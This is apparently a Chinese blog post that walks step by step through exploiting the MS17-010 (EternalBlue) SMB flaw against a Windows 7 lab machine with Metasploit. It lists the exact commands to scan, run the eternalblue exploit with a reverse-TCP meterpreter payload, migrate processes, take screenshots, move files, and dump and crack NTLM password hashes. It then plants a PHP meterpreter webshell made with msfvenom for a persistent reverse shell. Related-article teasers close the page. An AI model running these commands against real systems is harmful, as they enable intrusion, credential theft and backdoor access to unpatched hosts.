资讯专栏INFORMATION COLUMN

MS17-010漏洞利用

big_cat / 2364人阅读

摘要:漏洞利用漏洞利用安装虚拟机,实现利用实现对其主机开始渗透,查看该主机信息,打开远程桌面,抓取用户名和密码并破译,创建一个文件,实现上传,下载,删除。

MS17-010漏洞利用

1.安装虚拟机win7 x64,实现利用ms17-010实现对其win7 x64主机开始渗透,查看该主机信息,打开远程桌面,抓取用户名和密码并破译,创建一个 : 70zsz.txt文件,实现上传,下载,删除。

首先启动win7 x64虚拟机,查看IP地址为192.168.70.139,如下如图所示:

在win7 x64上搭建wamp网站服务器从上到下依次安装软件,如下如所示:

安装成功后通过浏览器访问192.168.70.139查看是否能正常访问该网站,如下图所示:

Ms17-010漏洞的利用

接下来打开kali实现利用ms17-010漏洞,实现对其win7 x64主机进行渗透,首先使用scanner下扫描模块扫描目标主机是否存在ms17-010的漏洞,如下图所示:
在kali中输入以下命令:

命令:msfconsole

命令:search ms17-010

>use auxiliary/scanner/smb/smb_ms17-010>set RHOSTS 192.168.70.139>run

确认目标机器的操作系统及存在漏洞之后便可以进行漏洞攻击了,输入命令use exploit/windows/smb/ms17_010_eternalblue,调用exploit下的ms17_010_eternalblue模块,并输入命令show payloads 查看可用的payload,如下图所示:

输入命令set payload windows/x64/meterpreter/reverse_tcp设置payload,并输入命令show options查看参数配置,如下图所示,需要配置的参数为RHOST和LHOST

输入命令set RHOST 192.168.70.139 配置目标机器的IP地址,输入命令set LHOST 192.168.70.134 配置kali本地的IP地址,配置完成后输入命令show options检查参数,如下图所示:

参数配置检查无误后,输入命令run开始攻击,并且返回一个meterptrter会话说明已经攻击成功了,如下图所示:

后渗透攻击:信息收集

进程迁移:例如攻击者利用浏览器漏洞攻陷了目标主机,但攻击渗透后的浏览器有可能被用户关闭,此shell是非常脆弱的,所以获取shell后的第一步就是移动这个shell,将它和目标主机中一个稳定的进程绑定在一起。

例如:输入ps命令获取目标主机正在运行的进程,如下图所示:

输入命令getpid查看meterperter shell的进程号为2280,如下图所示:

我们可用使用自动迁移进程命令,系统会自动寻找合适的进程然后进行迁移,输入自动迁移命令run post/windows/manage/migrate,执行命令后此时将原先的2280进程号修改为1244,如图所示:

收集系统信息:获取了稳定进程之后开始收集系统信息,输入命令sysinfo查看目标主机的系统信息,如下图所示:

捕获桌面输入命令screenshot抓取目标主机的屏幕截图路径为/root/bPgQxuoB,jpeg文件,如下图所示:

输入shell命令进入目标机器shell,如下图所示:

在shell输入exit可用停止shell会话并返回meterperter中,如下图所示:

上传文件命令upload,在kali虚拟机root目录下存在70zsz.txt文件,其内容为I‘m is 70 zsz!,输入命令upload /root/70zsz.txt c://,此文件上传到目标机器c:/目录下,如下图所示:

输入shell进入Windows shell查看从c:/目录下是否有刚刚我们上传的70zsz.txt文件,如下图所示:

下载文件命令download,输入命令download c:/70zsz.txt/root/download将目标机器c:/下的70zsz.txt下载到本机/root/download中,如下图所示:

输入命令rm c://70zsz.txt 将目标机器c:/下的70zsz.txt删除,如下图所示:

后渗透攻击:Hash攻击

使用Hashdump抓取密码,HashdumpMeterpreter脚本可用从目标机器中提取Hash值,破解Hash值可获得登录密码。计算机中的每个账号的用户名和密码都存储在sam中,当计算机运行时,该文件对所有账号进行锁定,想要访问就必须有“系统级“的账号。

在meterpreter shell提示符下输入hashdump命令,将导出sam数据库中Hash,如下图所示:

从图中我们可用看出,返回了三个用户账号,分别为Administrator,Guest,zsz,数据输出的格式为用户名:SID:LM哈希:NTLM哈希:::,在zsz账户中NTLM哈希进行破解,使用在线破解网站对其进行破解,如https://www.cmd5.com/,可以看到结果正是为zsz账户的密码:123456

后渗透攻击:后门

Meterpreter后门:在Meterpreter中,有一个名为PGP Meterpreter的payload,利用这个模块可创建具有Meterpreter功能的PHP WebShell,在攻击中使用Metasploit PHP Shell步骤如下:
1.使用msfvenom创建一个webshell.php

2.上传webshell.php到目标服务器

3.运行Metasploit multi-handler开始监听

4.访问webshell.php页面

5.获得反弹Metasploit shell

首先通过Metasploit的msfvenom攻击制作PHP Meterpreter,输入命令msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.70.134 -f raw > 070zsz.php,如下图所示:

因为目标主机使用了wampserver,因此得知需要上传070zsz.php文件至目标主机中c:/wamp64/www中,如下图所示:

输入exit返回meterpreter,使用上传命令upload/root/070zsz.php c://wamp64//www中,如下图所示:

输入exit回到msf,输入如下命令设置监听,如下图所示:

>exit>use exploit/multi/handler>set payload php/meterpreter/reverse_tcp>set LHOST 192.168.70.134>run

打开浏览器,访问目标机器服务器中070zsz.php文件,即访问http://192.168.70.139/070zsz.php ,结果可以看到服务端反弹shell成功如下图所示:

文章版权归作者所有,未经允许请勿转载,若此文章存在违规行为,您可以联系管理员删除。

转载请注明本文地址:https://www.ucloud.cn/yun/124528.html

相关文章

  • 经典利用永恒之蓝漏洞对Windows操作系统进行攻击

    摘要:利用永恒之蓝对进行攻击环境搭建,其中为靶机。命令有很多,想使用什么命令可以百度,我这里使用一些进行演示的命令就可以了。一般权限不够命令无法执行,这里简单介绍提权,提权方法百度多的很。至此本次利用永恒之蓝攻击漏洞拿到权限结束。 ...

    不知名网友 评论0 收藏0
  • MS17010(永恒之蓝)漏洞复现

    摘要:永恒之蓝漏洞利用与复现首先需要准备的环境做为靶机获取信息利用扫描得到靶机得到然后利用得到靶机信息发现可能利用的漏洞然后启动然后查找漏洞路径使用进行攻击然后输入然后在查看当前用户发现用乱码可以用这 ...

    Barrior 评论0 收藏0
  • Eternal Blue永恒之蓝漏洞利用--洪水猛兽

    摘要:永恒之蓝漏洞利用漏洞介绍什么是永恒之蓝漏洞恶意代码利用系统的漏洞可以获取系统最高权限。师傅们扫描开放文件及打印机共享端口的服务器,对该漏洞进行利用后无需用户任何操作,只要开机上网,即可向目标靶机植入远程控制木马,恶意插件等。 ...

    lijy91 评论0 收藏0
  • 漏洞利用三:445端口漏洞利用

    摘要:二永恒之蓝基于的漏洞,和最新版全部中招,属于系统级漏洞利用这一漏洞会使系统遭受蠕虫型攻击,这意味着很容易从一个受害者感染另一个受害者,一开机就感染。 445端口用来访问共享文件夹,445端口之所以危险,是因为厂商默认开放。 靶机:win7系统       IP:10.0.0.199     ...

    lifefriend_007 评论0 收藏0
  • 一次内网靶场学习记录

    摘要:环境搭建服务器外网内网域内机器内网内网域内服务器内网域控机器内网点击查看技术资料多本网络安全系列电子书网络安全标准题库资料项目源码网络安全基础入门安全攻防方面的视频网络安全学习路线图外网渗透端口扫描搭建好环境,对目标进 ...

    不知名网友 评论0 收藏0

发表评论

0条评论

最新活动
阅读需要支付1元查看
<